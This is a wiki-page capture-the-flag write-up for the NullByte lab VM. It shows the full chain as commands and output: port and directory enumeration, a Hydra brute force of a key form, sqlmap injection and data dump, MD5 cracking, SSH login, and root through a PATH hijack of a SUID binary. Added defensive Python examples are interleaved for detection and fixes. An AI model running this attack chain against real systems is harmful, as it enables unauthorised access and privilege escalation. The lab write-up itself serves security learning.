Below, the differences between two revisions of the page.

vm:nullbyte [2017/08/08 09:31] (current version) created by arkinar
**NullByte - Write Up**
__Reconnaissance__

<code bash>

open ports:

nmap -sS 192.168.43.111

Starting Nmap 6.47 ( http://nmap.org ) at 2017-08-08 09:34 CEST
Nmap scan report for NullByte (192.168.43.111)
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http

</code>


Port 111:
<code bash>
rpcinfo -p 192.168.43.111
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 38070 status
100024 1 tcp 50679 status
</code>

Port 777 (nmap only printed the IANA name for the port; the banner shows it is SSH):

<code bash>
nc 192.168.43.111 777
SSH-2.0-OpenSSH_6.7p1 Debian-5
</code>

__Web exploitation__

For port 80:

{{ :vm:nullbyte_web.png?nolink |}}

With the [[https://sourceforge.net/projects/dirb/files/ | dirb]] tool we look for existing files and directories:
<code bash>
./dirb http://192.168.43.111/ wordlists/common.txt

---- Scanning URL: http://192.168.43.111/ ----
+ http://192.168.43.111/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.43.111/javascript/
==> DIRECTORY: http://192.168.43.111/phpmyadmin/
==> DIRECTORY: http://192.168.43.111/uploads/

</code>

In the uploads directory:

<code html>

<html>
<head><title>Uploads dir</title></head>
<body>
<p>Directory listing not allowed here.</p>
</body>
</html>

</code>

In the phpmyadmin directory:

{{ :vm:nullbyte_phpmyadmin.png?nolink |}}

Version 4.2.12 is only affected by XSS and DoS issues.

The javascript directory contains the jQuery files.

Going back to the image on the home page:

<code bash>
exiftool main.gif
ExifTool Version Number : 9.74
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2017:08:08 09:56:17+02:00
File Access Date/Time : 2017:08:08 09:56:17+02:00
File Inode Change Date/Time : 2017:08:08 09:56:17+02:00
File Permissions : rw-r--r--
File Type : GIF
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
</code>

A directory named **kzMb5nVYJw** exists on the website.

A key is requested:

{{ :vm:nullbyte_key.png?nolink |}}

In the page source:

{{ :vm:nullbyte_kzmb5vyjw_comment.png?nolink |}}

We brute-force the key with Hydra:

<code bash>
hydra 192.168.43.111 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P /home/ark1nar/outils/wordlist/rockyou.txt
</code>

{{ :vm:nullbyte_hydra.png?nolink |}}

The key is: **elite**
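How this brute force looks from the server side, as an added example that is not part of the original write-up: Hydra's failure condition above is the body string "invalid key", so the form answers 200 to every guess and the status code is useless as a signal; the detector below instead counts POSTs to the key form per source IP in a sliding window. The Apache access-log lines are constructed; the form path is the one from the Hydra command.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format; only the fields the detector needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
KEY_FORM = "/kzMb5nVYJw/index.php"  # path taken from the Hydra command

def parse_line(line):
    """Return a dict with ip, ts (datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bursts(lines, threshold=20, window_s=60):
    """Map source IP -> peak number of POSTs to KEY_FORM inside any
    window_s-second window, for sources that exceeded threshold.
    The form returns 200 for wrong keys too, so status is ignored on purpose."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != KEY_FORM:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()  # drop attempts that fell out of the window
        if len(q) > threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts

def sample_log():
    """Constructed log: one page view, a 25-guess burst from one host within
    25 seconds (Hydra-like), and a single legitimate key submission."""
    fmt = '{ip} - - [08/Aug/2017:10:{m:02d}:{s:02d} +0200] "{meth} {path} HTTP/1.1" 200 640'
    lines = [fmt.format(ip="192.168.43.5", m=0, s=1, meth="GET", path="/index.html")]
    lines += [fmt.format(ip="192.168.43.2", m=1, s=i, meth="POST", path=KEY_FORM)
              for i in range(25)]
    lines.append(fmt.format(ip="192.168.43.5", m=2, s=0, meth="POST", path=KEY_FORM))
    return lines
```

Running find_bursts(sample_log()) reports only 192.168.43.2 with 25 POSTs; the single legitimate submission stays below the threshold.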

{{ :vm:nullbyte_search.png?nolink |}}

We submit the form without entering a username:

{{ :vm:nullbyte_kzmb5vyjw_search.png?nolink |}}

We have two users:
- ramses
- isis

The usrtosearch field is vulnerable to SQL injection:
<code bash>
./sqlmap.py -u http://192.168.43.111/kzMb5nVYJw/420search.php\?usrtosearch=ramses --dbs

back-end DBMS: MySQL >= 5.5
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

</code>

<code bash>
./sqlmap.py -u http://192.168.43.111/kzMb5nVYJw/420search.php\?usrtosearch=ramses -D seth -T users --dump
</code>
{{ :vm:nullbyte_sqli.png?nolink |}}
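The defect behind the sqlmap result and its fix, as an added example (Python with sqlite3; the VM's search page is PHP/MySQL and its source is not on this page): the same user lookup written with string concatenation and with a bound parameter, run against a constructed stand-in for the seth.users table. The two user names come from the page; the column set and password values are constructed.

```python
import sqlite3

def make_db():
    """Constructed stand-in for seth.users: the user names are from the
    page, the columns and password values are not."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users (user, pass) VALUES (?, ?)",
                   [("ramses", "<constructed>"), ("isis", "<constructed>")])
    return db

def search_vulnerable(db, usrtosearch):
    """The pattern sqlmap exploited: the request parameter is pasted into the
    SQL text, so a quote in it changes the structure of the query."""
    sql = ("SELECT user FROM users WHERE user LIKE '%" + usrtosearch + "%' "
           "ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def search_fixed(db, usrtosearch):
    """Same lookup with a bound parameter: the value is only ever compared
    against the column, never parsed as SQL. Note that % and _ still act as
    LIKE wildcards, which is why an empty search lists every user."""
    sql = "SELECT user FROM users WHERE user LIKE ? ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + usrtosearch + "%",))]

if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # one input the vulnerable query parses as SQL
    print("empty search:", search_fixed(db, ""))         # ['ramses', 'isis']
    print("vulnerable:", search_vulnerable(db, probe))   # ['ramses', 'isis']
    print("fixed:", search_fixed(db, probe))             # []
```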

<code bash>
echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE' | base64 -d
c6d6bd7ebf806f43c76acc3681703b81
</code>

The decoded value is an MD5 hash; we find its plaintext on [[https://crackstation.net/]]
{{ :vm:nullbyte_md5.png?nolink |}}

We log in to the server over SSH (port 777) with the credentials ramses/omega.

__System exploitation & privilege escalation__

Gathering system information:
<code bash>
ramses@NullByte:~$ uname -a
Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux

ramses@NullByte:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 8.1 (jessie)
Release: 8.1
Codename: jessie
</code>

Listing the SUID binaries:
<code bash>
ramses@NullByte:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
</code>

Checking the exim4 vulnerability:
<code bash>
ramses@NullByte:~$ /usr/sbin/exim4 --version
Exim version 4.84 #3 built 17-Feb-2015 17:01:53
Copyright (c) University of Cambridge, 1995 - 2014
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2014
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM PRDR OCSP
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerate
</code>

Version 4.84 is vulnerable to a privilege escalation only if Perl is enabled in the configuration.

That is not the case here.

Checking the bash_history of the user ramses:
<code bash>
bash-4.3$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
</code>

The procwatch binary is suspicious: the process list it prints shows it spawning sh, which in turn runs ps, so which ps actually executes depends on the caller's PATH.
<code bash>
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1354 pts/0 00:00:00 procwatch
1355 pts/0 00:00:00 sh
1356 pts/0 00:00:00 ps
</code>

Exploiting procwatch:
<code bash>
ramses@NullByte:/var/www/backup$ echo '/bin/sh' > ps

ramses@NullByte:/var/www/backup$ env
USER=ramses
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
PWD=/var/www/backup
HOME=/home/ramses

ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ chmod +x ps

ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
</code>
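Why the hijack works, and how a defender would catch and fix it, as an added example (Python; this is not the VM's procwatch source, which the page does not show): resolve_command() models the shell's PATH lookup with the two PATH values printed above, audit_suid() flags the one SUID entry that sits outside package-managed directories, and run_trusted() shows the launch discipline a SUID helper needs instead of calling ps through sh. The executable set and the abridged SUID listing are constructed from the page.

```python
import subprocess

# Where the package-managed SUID binaries in the find listing live.
TRUSTED_PREFIXES = ("/usr/lib/", "/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")

# PATH as printed by env, and as exported before running procwatch.
ORIGINAL_PATH = "/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
HIJACKED_PATH = "/var/www/backup:" + ORIGINAL_PATH

# Constructed stand-in for the filesystem: executables that exist on the box.
EXECUTABLES = {"/bin/ps", "/var/www/backup/procwatch", "/var/www/backup/ps"}

def resolve_command(name, path_env, executables=EXECUTABLES):
    """Model the shell's lookup of a bare command name: the first PATH
    directory holding an executable of that name wins."""
    for d in path_env.split(":"):
        cand = d.rstrip("/") + "/" + name
        if cand in executables:
            return cand
    return None

def audit_suid(find_output):
    """Flag entries of a `find / -perm -4000` listing that sit outside the
    directories package-managed binaries normally occupy."""
    return [p for p in find_output.splitlines()
            if p and not p.startswith(TRUSTED_PREFIXES)]

def run_trusted(argv):
    """How a privileged helper should launch a program instead of system("ps"):
    an absolute path under a trusted prefix, and a fixed minimal environment
    rather than whatever PATH the caller exported."""
    if not argv or not argv[0].startswith(TRUSTED_PREFIXES):
        raise ValueError(f"refusing to run {argv!r}: not an absolute trusted path")
    fixed_env = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}
    return subprocess.run(argv, env=fixed_env, check=False)

# Abridged from the find output above.
SUID_LISTING = """\
/usr/lib/openssh/ssh-keysign
/usr/bin/procmail
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/sbin/mount.nfs
"""
```

With ORIGINAL_PATH, "ps" resolves to /bin/ps; with HIJACKED_PATH it resolves to /var/www/backup/ps, which is the whole attack, and audit_suid() on the listing returns only /var/www/backup/procwatch.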

We are now root. Let's display the flag:
<code bash>
# cat /root/proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

</code>

Thanks to the author of the machine.